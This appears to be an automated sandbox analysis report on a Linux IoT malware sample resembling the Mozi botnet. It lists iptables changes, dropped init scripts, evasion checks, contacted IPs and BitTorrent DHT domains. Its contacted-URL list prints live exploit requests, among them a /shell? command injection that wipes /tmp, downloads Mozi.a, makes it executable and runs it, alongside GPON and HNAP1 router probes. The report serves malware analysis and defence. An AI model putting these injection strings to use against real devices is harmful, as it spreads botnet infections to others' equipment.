Source: /bin/sh (PID: 5210) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5231) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8000 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5234) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8000 -j ACCEPT Jump to behavior
Reads system information from the proc file system
Source: /tmp/rIbyGX66Op (PID: 4605) Reads from proc file: /proc/stat Jump to behavior
Sample tries to set the executable flag
Source: /tmp/rIbyGX66Op (PID: 4578) File: /usr/networks (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes ELF files to disk
Source: /tmp/rIbyGX66Op (PID: 4578) File written: /usr/networks Jump to dropped file
Writes shell script files to disk
Source: /tmp/rIbyGX66Op (PID: 4578) Shell script file created: /etc/rcS.d/S95baby.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) Shell script file created: /etc/init.d/S95baby.sh Jump to dropped file
Source: submitted sample Stderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directories
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/S95baby.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountall.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/checkfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/umountnfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountkernfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/checkroot-bootclean.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountnfs-bootclean.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/bootmisc.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/checkroot.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/hwclock.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/hostname.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountdevsubfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountall-bootclean.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /etc/init.d/mountnfs.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /usr/bin/gettext.sh Jump to dropped file
Source: /tmp/rIbyGX66Op (PID: 4578) File: /usr/sbin/alsa-info.sh Jump to dropped file
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 47738 -> 8443

Malware Analysis System Evasion:

barindex
Uses the "uname" system call to query kernel version information (possible evasion)
Source: /tmp/rIbyGX66Op (PID: 4559) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4578) Queries kernel information via 'uname': Jump to behavior
Source: /tmp/rIbyGX66Op (PID: 4601) Queries kernel information via 'uname': Jump to behavior
Source: /sbin/modprobe (PID: 4622) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5310) Queries kernel information via 'uname': Jump to behavior
Source: /usr/share/apport/apport-gtk (PID: 5335) Queries kernel information via 'uname': Jump to behavior
Source: kvm-test-1-run.sh.8.dr Binary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
Source: functions.sh0.8.dr Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.8.dr Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: kvm.sh.8.dr Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_pid=$!
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-recheck-lock.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: kvm-test-1-run.sh.8.dr Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm.sh.8.dr Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
Source: functions.sh0.8.dr Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.8.dr Binary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
Source: functions.sh0.8.dr Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_args () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
Source: functions.sh0.8.dr Binary or memory string: qemu-system-x86_64|qemu-system-i386)
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh0.8.dr Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm.sh.8.dr Binary or memory string: --qemu-args|--qemu-arg)
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: functions.sh0.8.dr Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.8.dr Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
Source: functions.sh0.8.dr Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.8.dr Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-ppc64
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
Source: functions.sh0.8.dr Binary or memory string: qemu-system-ppc64)
Source: functions.sh0.8.dr Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm-recheck-rcu.sh.8.dr Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_append qemu-cmd
Source: functions.sh0.8.dr Binary or memory string: identify_qemu_vcpus () {
Source: functions.sh0.8.dr Binary or memory string: # qemu-args already contains "-smp".
Source: kvm-test-1-run.sh.8.dr Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: functions.sh0.8.dr Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh0.8.dr Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: functions.sh0.8.dr Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh0.8.dr Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh0.8.dr Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.8.dr Binary or memory string: --qemu-cmd)
Source: kvm.sh.8.dr Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.8.dr Binary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: kvm-test-1-run.sh.8.dr Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate qemu -append arguments
Source: functions.sh0.8.dr Binary or memory string: # identify_qemu builddir
Source: functions.sh0.8.dr Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.8.dr Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: functions.sh0.8.dr Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.8.dr Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-i386
Source: functions.sh0.8.dr Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: functions.sh0.8.dr Binary or memory string: echo qemu-system-x86_64
Source: functions.sh0.8.dr Binary or memory string: identify_qemu () {

No Screenshots

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.157.0.194
 unknown United Kingdom
8426 CLARANET-ASClaraNETLTDGB false
96.85.17.58
 unknown United States
7922 COMCAST-7922US false
27.197.73.200
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
40.244.52.155
 unknown United States
4249 LILLY-ASUS false
118.208.32.220
 unknown Australia
7545 TPG-INTERNET-APTPGTelecomLimitedAU false
220.236.199.32
 unknown Australia
4804 MPX-ASMicroplexPTYLTDAU false
64.134.176.11
 unknown United States
14654 WAYPORTUS false
5.71.245.186
 unknown United Kingdom
5607 BSKYB-BROADBAND-ASGB false
13.162.43.135
 unknown United States
7018 ATT-INTERNET4US false
97.71.87.134
 unknown United States
33363 BHN-33363US false
72.163.148.240
 unknown United States
109 CISCOSYSTEMSUS false
39.187.20.227
 unknown China
56041 CMNET-ZHEJIANG-APChinaMobilecommunicationscorporationC false
175.111.30.198
 unknown Korea Republic of
38676 FLEXNET-AS-KRflexnetworksKR false
96.100.50.191
 unknown United States
7922 COMCAST-7922US false
119.215.90.101
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
86.170.164.103
 unknown United Kingdom
2856 BT-UK-ASBTnetUKRegionalnetworkGB false
172.143.86.137
 unknown United States
7018 ATT-INTERNET4US false
39.241.4.19
 unknown Indonesia
23693 TELKOMSEL-ASN-IDPTTelekomunikasiSelularID false
196.164.176.188
 unknown South Africa
328065 Vast-Networks-ASZA false
46.14.87.211
 unknown Switzerland
3303 SWISSCOMSwisscomSwitzerlandLtdCH false
14.239.14.115
 unknown Viet Nam
45899 VNPT-AS-VNVNPTCorpVN false
35.37.134.166
 unknown United States
36375 UMICH-AS-5US false
102.44.180.253
 unknown Egypt
8452 TE-ASTE-ASEG false
166.201.228.49
 unknown United States
20057 ATT-MOBILITY-LLC-AS20057US false
136.26.47.177
 unknown United States
19165 WEBPASSUS false
178.82.160.65
 unknown Switzerland
6830 LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding false
37.211.3.99
 unknown Qatar
42298 GCC-MPLS-PEERINGGCCMPLSpeeringQA false
11.89.47.10
 unknown United States
3356 LEVEL3US false
124.12.205.156
 unknown Taiwan; Republic of China (ROC)
9924 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi false
5.232.235.2
 unknown Iran (ISLAMIC Republic Of)
58224 TCIIR false
217.131.3.242
 unknown Turkey
34984 TELLCOM-ASTR false
182.9.38.118
 unknown Indonesia
23693 TELKOMSEL-ASN-IDPTTelekomunikasiSelularID false
187.213.209.8
 unknown Mexico
8151 UninetSAdeCVMX false
181.113.148.196
 unknown Ecuador
28006 CORPORACIONNACIONALDETELECOMUNICACIONES-CNTEPEC false
79.116.36.122
 unknown Romania
8708 RCS-RDS73-75DrStaicoviciRO false
157.159.2.178
 unknown France
2094 FR-TELECOM-MANAGEMENT-SUDPARISTelecomManagementSudPari false
133.82.183.72
 unknown Japan 2907 SINET-ASResearchOrganizationofInformationandSystemsN false
77.187.60.235
 unknown Germany
6805 TDDE-ASN1DE false
221.68.20.5
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
53.117.221.59
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
2.164.195.43
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
68.129.151.18
 unknown United States
701 UUNETUS false
108.204.197.113
 unknown United States
7018 ATT-INTERNET4US false
95.82.71.140
 unknown Kazakhstan
21299 KAR-TEL-ASAlmatyRepublicofKazakhstanKZ false
128.101.242.184
 unknown United States
217 UMN-SYSTEMUS false
185.149.161.32
 unknown Russian Federation
61131 ZONATELECOM-ASRU false
118.191.184.146
 unknown China
59045 SUNHONGSGuangzhounavigationinformationtechnologycoLT false
221.97.226.130
 unknown Japan 17676 GIGAINFRASoftbankBBCorpJP false
197.67.5.164
 unknown South Africa
16637 MTNNS-ASZA false
203.49.228.158
 unknown Australia
1221 ASN-TELSTRATelstraCorporationLtdAU false
185.189.120.185
 unknown Iran (ISLAMIC Republic Of)
64413 AVAGOSTARIR false
117.177.0.80
 unknown China
9808 CMNET-GDGuangdongMobileCommunicationCoLtdCN false
194.207.227.221
 unknown United Kingdom
12390 KINGSTON-UK-ASGB false
104.222.233.43
 unknown United States
22552 ESITEDUS false
208.150.231.33
 unknown United States
3561 CENTURYLINK-LEGACY-SAVVISUS false
162.159.107.38
 unknown United States
13335 CLOUDFLARENETUS false
120.123.201.216
 unknown Taiwan; Republic of China (ROC)
17716 NTU-TWNationalTaiwanUniversityTW false
87.178.42.105
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false
166.231.171.29
 unknown United States
6614 USCC-ASNUS false
113.81.33.205
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
18.198.126.226
 unknown United States
16509 AMAZON-02US false
32.26.172.252
 unknown United States
2686 ATGS-MMD-ASUS false
84.234.82.133
 unknown Denmark
16095 JAYNETSentiaDanmarkASDK false
64.48.220.97
 unknown United States
2828 XO-AS15US false
86.18.93.173
 unknown United Kingdom
5089 NTLGB false
163.112.176.81
 unknown France
17816 CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovi false
200.161.213.126
 unknown Brazil
27699 TELEFONICABRASILSABR false
32.69.172.174
 unknown United States
2686 ATGS-MMD-ASUS false
161.141.143.253
 unknown Canada
17311 ECMC-BGPUS false
68.87.138.12
 unknown United States
7922 COMCAST-7922US false
91.244.32.53
 unknown Ukraine
25133 MCLAUT-ASUA false
175.12.222.235
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
17.103.205.243
 unknown United States
714 APPLE-ENGINEERINGUS false
199.247.32.171
 unknown United States
396982 GOOGLE-PRIVATE-CLOUDUS false
120.72.175.96
 unknown China
24430 CNNIC-CHINAPOST-APCHINASTATEPOSTBUREAUCN false
19.21.98.61
 unknown United States
3 MIT-GATEWAYSUS false
134.106.59.104
 unknown Germany
680 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese false
107.112.161.192
 unknown United States
46164 ATT-MOBILITY-LABSUS false
167.13.97.181
 unknown United States
3816 COLOMBIATELECOMUNICACIONESSAESPCO false
4.214.87.116
 unknown United States
3356 LEVEL3US false
53.181.254.20
 unknown Germany
31399 DAIMLER-ASITIGNGlobalNetworkDE false
115.24.120.43
 unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
79.73.229.27
 unknown United Kingdom
9105 TISCALI-UKTalkTalkCommunicationsLimitedGB false
35.121.101.202
 unknown United States
237 MERIT-AS-14US false
94.117.20.210
 unknown United Kingdom
41012 THECLOUDGB false
119.100.162.203
 unknown China
4134 CHINANET-BACKBONENo31Jin-rongStreetCN false
202.146.185.28
 unknown unknown
24536 ELNUS-AS-IDPTElektrindoDataNusantaraID false
222.121.68.4
 unknown Korea Republic of
4766 KIXS-AS-KRKoreaTelecomKR false
35.224.66.235
 unknown United States
15169 GOOGLEUS false
121.192.9.176
 unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
201.195.173.239
 unknown Costa Rica
11830 InstitutoCostarricensedeElectricidadyTelecomCR false
155.228.130.68
 unknown Switzerland
25021 CIEF-ASEtatdeFribourgSITelCH false
128.188.21.157
 unknown United States
7645 DEAKIN-AS-APDeakinUniversityAU false
60.234.236.97
 unknown New Zealand
9790 VOCUSGROUPNZVocusGroupNZ false
145.152.174.114
 unknown Netherlands
1103 SURFNET-NLSURFnetTheNetherlandsNL false
138.94.203.237
 unknown Brazil
264169 WSPPROGRESSOESERVDETELECOMUNICACAOLTDA-MEBR true
180.77.237.198
 unknown China
17429 BGCTVNETBEIJINGGEHUACATVNETWORKCOLTDCN false
159.196.101.170
 unknown Australia
4764 WIDEBAND-AS-APAussieBroadbandAU false
197.35.48.236
 unknown Egypt
8452 TE-ASTE-ASEG false
175.158.80.139
 unknown India
33480 WEBWERKSAS1US false

Contacted Domains

Name IP Active
dht.transmissionbt.com 212.129.33.59 true
bttracker.acc.umu.se 130.239.18.159 true
router.bittorrent.com 67.215.246.10 true
router.utorrent.com 82.221.103.244 true
bttracker.debian.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://127.0.0.1:80/GponForm/diag_Form?images/ true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://127.0.0.1:8080/GponForm/diag_Form?images/ false
  • Avira URL Cloud: safe
 unknown
http://95.217.3.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://104.72.178.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://3.11.29.16:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://164.125.103.242:80/HNAP1/ false
  • Avira URL Cloud: safe
 unknown
http://220.130.214.100:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://121.5.104.125:80/HNAP1/ true
  • Avira URL Cloud: safe
 unknown
http://69.195.90.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws true
  • Avira URL Cloud: safe
 unknown
http://34.90.159.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws false
  • Avira URL Cloud: safe
 unknown